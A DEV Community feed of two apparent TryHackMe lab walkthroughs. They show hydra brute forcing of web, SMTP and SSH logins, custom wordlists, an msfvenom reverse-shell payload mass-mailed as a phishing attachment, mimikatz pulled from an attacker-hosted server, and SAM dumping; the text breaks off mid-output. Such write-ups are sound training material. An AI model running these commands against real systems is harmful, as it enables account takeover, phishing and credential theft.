The latest articles on DEV Community by Md. Ibrahim Reza Rabbi (@ibrahim71reza). https://dev.to/ibrahim71reza https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3886474%2Fb6184b8c-0cdf-45b1-a795-6c8132634a9f.png https://dev.to/ibrahim71reza en Md. Ibrahim Reza Rabbi Wed, 17 Jun 2026 10:42:07 +0000 https://dev.to/ibrahim71reza/checkmate-tryhackme-writeup-credential-attacks-custom-wordlists-and-ssh-brute-force-5cm2 https://dev.to/ibrahim71reza/checkmate-tryhackme-writeup-credential-attacks-custom-wordlists-and-ssh-brute-force-5cm2 <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpelcjdymfjzzpnek1d5v.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpelcjdymfjzzpnek1d5v.png" alt=" " width="800" height="418"></a></p> <p>Challenge 1:</p> <blockquote> <p>Marco deployed a firewall at firewall.thm:5001 but kept default credentials.</p> </blockquote> <p>Used this Command to get the pasword<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>hydra <span class="nt">-l</span> admin <span class="nt">-P</span> /usr/share/wordlists/rockyou.txt <span class="nt">-f</span> <span class="nt">-V</span> <span class="nt">-t</span> 4 10.48.180.224 <span class="nt">-s</span> 5001 http-post-form <span class="s1">'/login:username=^USER^&amp;password=^PASS^:F=Invalid credentials'</span> </code></pre> </div> <p>from page source got the parameters -&gt; </p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F470x09vjav364k1yxr5h.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F470x09vjav364k1yxr5h.png" alt=" " width="799" height="102"></a></p> <p>And for an incorrect password it was showing "Invalid credentials"</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbe2ri7a8b0sivrdgxfsy.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbe2ri7a8b0sivrdgxfsy.png" alt=" " width="563" height="559"></a></p> <p>Challenge 2:</p> <blockquote> <p>Marco built an internal Employee Login panel on jobs.thm:5002 and used common company keywords as passwords.</p> </blockquote> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhl1fxfjv1odiyugsk3oz.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhl1fxfjv1odiyugsk3oz.png" alt=" " width="800" height="504"></a></p> <p>We CEWL keywords from the site,<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">┌──(kali㉿kali)-[~/Try_Hack_Me/Challenges] </span><span class="gp">└─$</span><span class="w"> </span>cewl <span class="nt">--lowercase</span> http://10.48.180.224:5002/ <span class="o">&gt;</span> passwords.txt </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">┌──(kali㉿kali)-[~/Try_Hack_Me/Challenges] </span><span class="gp">└─$</span><span class="w"> </span>hydra <span class="nt">-l</span> marco <span class="nt">-P</span> passwords.txt <span class="nt">-f</span> <span class="nt">-V</span> <span class="nt">-t</span> 4 10.48.180.224 <span class="nt">-s</span> 5002 http-post-form <span class="s1">'/login:username=^USER^&amp;password=^PASS^:F=Invalid credentials'</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fts9cqp259gj8e5w8n0z1.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fts9cqp259gj8e5w8n0z1.png" alt=" " width="799" height="326"></a></p> <p>Challenge 3 :</p> <blockquote> <p>Navigate to social.thm:5003 and derive Marco's password from personal info.</p> </blockquote> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faf6ijxfwangsae6q76zb.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faf6ijxfwangsae6q76zb.png" alt=" " width="799" height="297"></a></p> <p>With those info to make a wordlist "CUPP" is the best tool<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">┌──(kali㉿kali)-[~/Try_Hack_Me/Challenges] </span><span class="gp">└─$</span><span class="w"> </span>cupp <span class="nt">-i</span> <span class="go"> ___________ </span><span class="gp"> cupp.py! #</span><span class="w"> </span>Common <span class="gp"> \ #</span><span class="w"> </span>User <span class="gp"> \ ,__, #</span><span class="w"> </span>Passwords <span class="gp"> \ (oo)____ #</span><span class="w"> </span>Profiler <span class="go"> (__) )\ ||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ] [ Mebus | https://github.com/Mebus/] [+] Insert the information about the victim to make a dictionary </span><span class="gp">[+] If you don't know all the info, just hit enter when asked! ;</span><span class="o">)</span> <span class="go"> </span><span class="gp">&gt;</span><span class="w"> </span>First Name: Marco <span class="gp">&gt;</span><span class="w"> </span>Surname: Bianchi <span class="gp">&gt;</span><span class="w"> </span>Nickname: marky <span class="gp">&gt;</span><span class="w"> </span>Birthdate <span class="o">(</span>DDMMYYYY<span class="o">)</span>: 14021995 <span class="go"> </span><span class="gp">&gt;</span><span class="w"> </span>Partners<span class="o">)</span> name: <span class="gp">&gt;</span><span class="w"> </span>Partners<span class="o">)</span> nickname: <span class="gp">&gt;</span><span class="w"> </span>Partners<span class="o">)</span> birthdate <span class="o">(</span>DDMMYYYY<span class="o">)</span>: <span class="go"> </span><span class="gp">&gt;</span><span class="w"> </span>Child<span class="s1">'s name: </span><span class="gp">&gt;</span><span class="w"> </span><span class="s1">Child'</span>s nickname: <span class="gp">&gt;</span><span class="w"> </span>Child<span class="s1">'s birthdate (DDMMYYYY): </span><span class="go"> </span><span class="gp">&gt;</span><span class="w"> </span>Pet<span class="s1">'s name: </span><span class="gp">&gt;</span><span class="w"> </span><span class="s1">Company name: </span><span class="go"> </span><span class="gp">&gt;</span><span class="w"> </span>Do you want to add some key words about the victim? Y/[N]: N <span class="gp">&gt;</span><span class="w"> </span>Do you want to add special chars at the end of words? Y/[N]: N <span class="gp">&gt;</span><span class="w"> </span>Do you want to add some random numbers at the end of words? Y/[N]:N <span class="gp">&gt;</span><span class="w"> </span>Leet mode? <span class="o">(</span>i.e. leet <span class="o">=</span> 1337<span class="o">)</span> Y/[N]: N <span class="go"> [+] Now making a dictionary... [+] Sorting list and removing duplicates... [+] Saving dictionary to marco.txt, counting 2816 words. [+] Now load your pistolero with marco.txt and shoot! Good luck! </span></code></pre> </div> <p>then used this command -&gt;<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>hydra <span class="nt">-l</span> marco <span class="nt">-P</span> marco.txt <span class="nt">-f</span> <span class="nt">-V</span> <span class="nt">-t</span> 4 10.48.180.224 <span class="nt">-s</span> 5003 http-post-form <span class="s1">'/login:username=^USER^&amp;password=^PASS^:F=Invalid credentials'</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft6g6uaxi77xbztoziljw.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft6g6uaxi77xbztoziljw.png" alt=" " width="785" height="155"></a></p> <p>Challenge 4:</p> <blockquote> <p>On social.thm:5003, Marco recently uploaded a new profile picture. For privacy and storage consistency, the platform automatically renames uploaded files to the SHA256 hash of the original filename and saves them in the format (SHA256).png. Your task is to identify the original filename of Marco’s uploaded profile picture. Submit only the filename to proceed.</p> </blockquote> <p>after log in with that credential we got this interface -&gt;</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fknkp2zj798w63kghvb10.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fknkp2zj798w63kghvb10.png" alt=" " width="799" height="427"></a><br> When we opoened his profile pic noticed the file name is sha-256,</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkr9zwx5ak1cdkj6cihvn.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkr9zwx5ak1cdkj6cihvn.png" alt=" " width="800" height="485"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwon2lbswi64byytj81lt.jpeg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwon2lbswi64byytj81lt.jpeg" alt=" " width="702" height="385"></a></p> <p>Challenge 5:</p> <blockquote> <p>Marco has revealed his password pattern on social.thm:5003, using predictable rules based on keywords and formatting. Use this information to generate a targeted wordlist and brute-force the SSH service with username marco.</p> </blockquote> <p>Now notice marco's post and also notice "oliver" hotel name-&gt;</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6t02i7vwgtqxjukdv24m.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6t02i7vwgtqxjukdv24m.png" alt=" " width="646" height="179"></a><br> But the oliver is not the company keyword what marco was indicating he was indicating "security" keyword under his post -&gt;<br> so used this 2 commands -&gt;<br> <code>crunch 13 13 -t Security20%%! -o marco_wordlist.txt</code><br> <code>hydra -l marco -P marco_wordlist.txt ssh://10.48.180.224</code><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi8o1fxhiq52qfuglw5jo.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi8o1fxhiq52qfuglw5jo.png" alt=" " width="800" height="695"></a></p> Md. Ibrahim Reza Rabbi Wed, 17 Jun 2026 07:17:24 +0000 https://dev.to/ibrahim71reza/you-got-mail-compromising-a-windows-mail-server-tryhackme-4kd7 https://dev.to/ibrahim71reza/you-got-mail-compromising-a-windows-mail-server-tryhackme-4kd7 <p>In this walkthrough, we'll explore how one email password led to a complete mail server compromise.</p> <p>NMAP command,<br> <code>sudo nmap -sS -sV -sC -O -Pn -p- --min-rate 1000 -T4 -oA fullscan &lt;target-ip&gt;</code></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F99wqhe1set7b9rblue42.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F99wqhe1set7b9rblue42.png" alt=" " width="684" height="605"></a></p> <blockquote> <p>The target is a <strong>Windows mail server (BRICK-MAIL)</strong> running <strong>hMailServer</strong> with SMTP, POP3, and IMAP services exposed. It also has <strong>SMB (445)</strong>, <strong>RDP (3389)</strong>, and <strong>WinRM (5985)</strong> open, making those the main services to investigate next.</p> </blockquote> <p>When I surf the website <strong><a href="https://brownbrick.co/" rel="noopener noreferrer">https://brownbrick.co/</a></strong>, I noticed this part -&gt;</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Friuvc3q5of5ouu1r5dmk.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Friuvc3q5of5ouu1r5dmk.png" alt=" " width="800" height="420"></a></p> <p>I listed all the emails and for the password try to gather the keywords from the website with the help of the "cewl" &amp; after that with "hydra" checked the open SMTP server at <strong>port 587</strong> to find a legit password of someone -&gt;<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">&gt;</span><span class="w"> </span>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Try_Hack_Me] <span class="gp">&gt;</span><span class="w"> </span>└─<span class="nv">$ </span><span class="nb">cat </span>emails.txt <span class="gp">&gt;</span><span class="w"> </span>oaurelius@brownbrick.co <span class="gp">&gt;</span><span class="w"> </span>wrohit@brownbrick.co <span class="gp">&gt;</span><span class="w"> </span>lhedvig@brownbrick.co <span class="gp">&gt;</span><span class="w"> </span>tchikondi@brownbrick.co <span class="gp">&gt;</span><span class="w"> </span>pcathrine@brownbrick.co <span class="gp">&gt;</span><span class="w"> </span>fstamatis@brownbrick.co <span class="gp">&gt;</span><span class="w"> </span><span class="gp">&gt;</span><span class="w"> </span>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Try_Hack_Me] <span class="gp">&gt;</span><span class="w"> </span>└─<span class="nv">$ </span>cewl <span class="nt">--lowercase</span> https://brownbrick.co/ <span class="o">&gt;</span> passwords.txt <span class="gp">&gt;</span><span class="w"> </span><span class="gp">&gt;</span><span class="w"> </span>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Try_Hack_Me] <span class="gp">&gt;</span><span class="w"> </span>└─<span class="nv">$ </span>hydra <span class="nt">-L</span> emails.txt <span class="nt">-P</span> passwords.txt 10.49.179.117 smtp <span class="nt">-s</span> 587 <span class="nt">-t</span> 12 <span class="gp">&gt;</span><span class="w"> </span>Hydra v9.6 <span class="o">(</span>c<span class="o">)</span> 2023 by van Hauser/THC &amp; David Maciejak - Please <span class="k">do </span>not use <span class="k">in </span>military or secret service organizations, or <span class="k">for </span>illegal purposes <span class="o">(</span>this is non-binding, these <span class="k">***</span> ignore laws and ethics anyway<span class="o">)</span><span class="nb">.</span> <span class="gp">&gt;</span><span class="w"> </span>Hydra <span class="o">(</span>https://github.com/vanhauser-thc/thc-hydra<span class="o">)</span> starting at 2026-06-13 06:28:48 <span class="gp">&gt;</span><span class="w"> </span><span class="o">[</span>INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal! <span class="gp">&gt;</span><span class="w"> </span><span class="o">[</span>DATA] max 12 tasks per 1 server, overall 12 tasks, 1134 login tries <span class="o">(</span>l:6/p:189<span class="o">)</span>, ~95 tries per task <span class="gp">&gt;</span><span class="w"> </span><span class="o">[</span>DATA] attacking smtp://10.49.179.117:587/ <span class="gp">&gt;</span><span class="w"> </span><span class="o">[</span>587][smtp] host: 10.49.179.117 login: lhedvig@brownbrick.co password: br<span class="k">***</span>s <span class="gp">&gt;</span><span class="w"> </span>1 of 1 target successfully completed, 1 valid password found <span class="gp">&gt;</span><span class="w"> </span>Hydra <span class="o">(</span>https://github.com/vanhauser-thc/thc-hydra<span class="o">)</span> finished at 2026-06-13 06:29:27 <span class="go"> </span></code></pre> </div> <p>Now, with this "<a href="mailto:lhedvig@brownbrick.co">lhedvig@brownbrick.co</a>" we can send a phishing mail in which we can make the other users to click or execute our attached malicious file [ which we will collect from the "msfvenom" (reverse shell for windows) ] and we notice that "wrohit" user was the victim -&gt;<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">&gt;</span><span class="w"> </span>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Try_Hack_Me] <span class="gp">&gt;</span><span class="w"> </span>└─<span class="nv">$ </span>msfvenom <span class="nt">-p</span> windows/x64/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>192.168.129.81 <span class="nv">LPORT</span><span class="o">=</span>443 <span class="nt">-f</span> exe <span class="nt">-o</span> shell.exe <span class="gp">&gt;</span><span class="w"> </span><span class="o">[</span>-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload <span class="gp">&gt;</span><span class="w"> </span><span class="o">[</span>-] No <span class="nb">arch </span>selected, selecting <span class="nb">arch</span>: x64 from the payload <span class="gp">&gt;</span><span class="w"> </span>No encoder specified, outputting raw payload <span class="gp">&gt;</span><span class="w"> </span>Payload size: 460 bytes <span class="gp">&gt;</span><span class="w"> </span>Final size of exe file: 7680 bytes <span class="gp">&gt;</span><span class="w"> </span>Saved as: shell.exe <span class="gp">&gt;</span><span class="w"> </span><span class="gp">&gt;</span><span class="w"> </span>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Try_Hack_Me] <span class="gp">&gt;</span><span class="w"> </span>└─<span class="nv">$ </span><span class="k">for </span>email <span class="k">in</span> <span class="si">$(</span><span class="nb">cat </span>emails.txt<span class="si">)</span><span class="p">;</span> <span class="k">do </span>sendemail <span class="nt">-f</span> <span class="s2">"lhedvig@brownbrick.co"</span> <span class="nt">-t</span> <span class="s2">"</span><span class="nv">$email</span><span class="s2">"</span> <span class="nt">-u</span> <span class="s2">"test"</span> <span class="nt">-m</span> <span class="s2">"test"</span> <span class="nt">-a</span> shell.exe <span class="nt">-s</span> 10.49.179.117:25 <span class="nt">-xu</span> <span class="s2">"lhedvig@brownbrick.co"</span> <span class="nt">-xp</span> <span class="s2">"bricks"</span><span class="p">;</span> <span class="k">done</span> <span class="gp">&gt;</span><span class="w"> </span>Jun 13 07:40:38 kali sendemail[5277]: Email was sent successfully! <span class="gp">&gt;</span><span class="w"> </span>Jun 13 07:40:39 kali sendemail[5278]: Email was sent successfully! <span class="gp">&gt;</span><span class="w"> </span>Jun 13 07:40:39 kali sendemail[5279]: Email was sent successfully! <span class="gp">&gt;</span><span class="w"> </span>Jun 13 07:40:40 kali sendemail[5280]: Email was sent successfully! <span class="gp">&gt;</span><span class="w"> </span>Jun 13 07:40:40 kali sendemail[5281]: Email was sent successfully! <span class="gp">&gt;</span><span class="w"> </span>Jun 13 07:40:41 kali sendemail[5282]: Email was sent successfully! </code></pre> </div> <p>And in the reverse shell listener port we get this -&gt;<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">&gt;</span><span class="w"> </span>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Try_Hack_Me] <span class="gp">&gt;</span><span class="w"> </span>└─<span class="nv">$ </span>rlwrap nc <span class="nt">-lvnp</span> 443 <span class="gp">&gt;</span><span class="w"> </span>listening on <span class="o">[</span>any] 443 ... <span class="gp">&gt;</span><span class="w"> </span>connect to <span class="o">[</span>192.168.129.81] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.49.179.117] 49946 <span class="gp">&gt;</span><span class="w"> </span>Microsoft Windows <span class="o">[</span>Version 10.0.17763.1821] <span class="gp">&gt;</span><span class="w"> </span><span class="o">(</span>c<span class="o">)</span> 2018 Microsoft Corporation. All rights reserved. <span class="gp">&gt;</span><span class="w"> </span>C:<span class="se">\M</span>ail<span class="se">\A</span>ttachments&gt;whoami <span class="gp">&gt;</span><span class="w"> </span><span class="nb">whoami</span> <span class="gp">&gt;</span><span class="w"> </span>brick-mail<span class="se">\w</span>rohit <span class="gp">&gt;</span><span class="w"> </span>C:<span class="se">\M</span>ail<span class="se">\A</span>ttachments&gt;dir <span class="gp">&gt;</span><span class="w"> </span><span class="nb">dir</span> <span class="gp">&gt;</span><span class="w"> </span>Volume <span class="k">in </span>drive C has no label. <span class="gp">&gt;</span><span class="w"> </span>Volume Serial Number is A8A4-C362 <span class="gp">&gt;</span><span class="w"> </span>Directory of C:<span class="se">\M</span>ail<span class="se">\A</span>ttachments <span class="gp">&gt;</span><span class="w"> </span>06/13/2026 11:40 AM &lt;DIR&gt; <span class="nb">.</span> <span class="gp">&gt;</span><span class="w"> </span>06/13/2026 11:40 AM &lt;DIR&gt; .. <span class="gp">&gt;</span><span class="w"> </span>03/17/2024 06:09 PM 258 exec-mail.ps1 <span class="gp">&gt;</span><span class="w"> </span>06/13/2026 11:40 AM 7,680 shell.exe <span class="gp">&gt;</span><span class="w"> </span>2 File<span class="o">(</span>s<span class="o">)</span> 7,938 bytes <span class="gp">&gt;</span><span class="w"> </span>2 Dir<span class="o">(</span>s<span class="o">)</span> 13,990,260,736 bytes free <span class="gp">&gt;</span><span class="w"> </span>C:<span class="se">\M</span>ail<span class="se">\A</span>ttachments&gt;dir C:<span class="se">\*</span>flag<span class="k">*</span>.txt /s <span class="gp">&gt;</span><span class="w"> </span><span class="nb">dir </span>C:<span class="se">\*</span>flag<span class="k">*</span>.txt /s <span class="gp">&gt;</span><span class="w"> </span>Volume <span class="k">in </span>drive C has no label. <span class="gp">&gt;</span><span class="w"> </span>Volume Serial Number is A8A4-C362 <span class="gp">&gt;</span><span class="w"> </span>Directory of C:<span class="se">\U</span>sers<span class="se">\w</span>rohit<span class="se">\D</span>esktop <span class="gp">&gt;</span><span class="w"> </span>03/11/2024 05:15 AM 25 flag.txt <span class="gp">&gt;</span><span class="w"> </span>1 File<span class="o">(</span>s<span class="o">)</span> 25 bytes <span class="gp">&gt;</span><span class="w"> </span>Total Files Listed: <span class="gp">&gt;</span><span class="w"> </span>1 File<span class="o">(</span>s<span class="o">)</span> 25 bytes <span class="gp">&gt;</span><span class="w"> </span>0 Dir<span class="o">(</span>s<span class="o">)</span> 13,990,260,736 bytes free <span class="gp">&gt;</span><span class="w"> </span>C:<span class="se">\M</span>ail<span class="se">\A</span>ttachments&gt;type C:<span class="se">\U</span>sers<span class="se">\w</span>rohit<span class="se">\D</span>esktop<span class="se">\f</span>lag.txt <span class="gp">&gt;</span><span class="w"> </span><span class="nb">type </span>C:<span class="se">\U</span>sers<span class="se">\w</span>rohit<span class="se">\D</span>esktop<span class="se">\f</span>lag.txt <span class="gp">&gt;</span><span class="w"> </span>THM<span class="o">{</span>l1v1n_7h3_<span class="k">*****</span>_<span class="k">****</span><span class="o">}</span> </code></pre> </div> <p>and we get the flag.</p> <p>At this point, since we are a member of the Administrators group, we can simply upload Mimikatz to the machine and use it to dump the hashes from the SAM registry as follows:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frge6g6js2yd2dhtw2jws.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frge6g6js2yd2dhtw2jws.png" alt=" " width="499" height="663"></a></p> <p>host a python server -&gt;<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">┌──(kali㉿kali)-[~/Try_Hack_Me] </span><span class="gp">└─$</span><span class="w"> </span>wget https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe <span class="go">--2026-06-13 08:00:57-- https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe Resolving github.com (github.com)... 20.205.243.166 Connecting to github.com (github.com)|20.205.243.166|:443... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: ‘mimikatz.exe’ </span><span class="gp">mimikatz.exe [ &lt;=&gt;</span><span class="w"> </span><span class="o">]</span> 220.01K 757KB/s <span class="k">in </span>0.3s <span class="go"> 2026-06-13 08:00:59 (757 KB/s) - ‘mimikatz.exe’ saved [225288] ┌──(kali㉿kali)-[~/Try_Hack_Me] </span><span class="gp">└─$</span><span class="w"> </span>python3 <span class="nt">-m</span> http.server 8000 <span class="go">Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.49.179.117 - - [13/Jun/2026 08:02:12] "GET /mimikatz.exe HTTP/1.1" 200 - </span></code></pre> </div> <p>and download that from the reverse shell -&gt;<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="kd">C</span>:\Mail\Attachments&gt;curl <span class="kd">http</span>://192.168.129.81:8000/mimikatz.exe <span class="na">-o </span><span class="kd">mimikatz</span><span class="err">.exe</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9v1hrkkd2sy7ylcll8hp.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9v1hrkkd2sy7ylcll8hp.png" alt=" " width="530" height="512"></a></p> <p>then, we searched for the method of dumping Sam database via mimikatz -&gt;<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4t2035ifpfskpd990qdl.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4t2035ifpfskpd990qdl.png" alt=" " width="749" height="845"></a><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">C:\Mail\Attachments&gt;</span>mimikatz.exe <span class="go">mimikatz.exe </span><span class="gp"> .#</span><span class="c">####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36</span> <span class="gp"> .#</span><span class="c"># ^ ##. "A La Vie, A L'Amour" - (oe.eo)</span> <span class="gp"> #</span><span class="c"># / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )</span> <span class="gp"> #</span><span class="c"># \ / ## &gt; http://blog.gentilkiwi.com/mimikatz</span> <span class="gp"> '#</span><span class="c"># v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )</span> <span class="gp"> '#</span><span class="c">####' &gt; http://pingcastle.com / http://mysmartlogon.com ***/</span> <span class="gp"> mimikatz #</span><span class="w"> </span>privilege::debug <span class="go"> Privilege '20' OK </span><span class="gp"> mimikatz #</span><span class="w"> </span>token::elevate <span class="go"> Token Id : 0 User name : SID name : NT AUTHORITY\SYSTEM </span><span class="gp"> 728 {0;</span>000003e7<span class="o">}</span> 1 D 25319 NT AUTHORITY<span class="se">\S</span>YSTEM S-1-5-18 <span class="o">(</span>04g,21p<span class="o">)</span> Primary <span 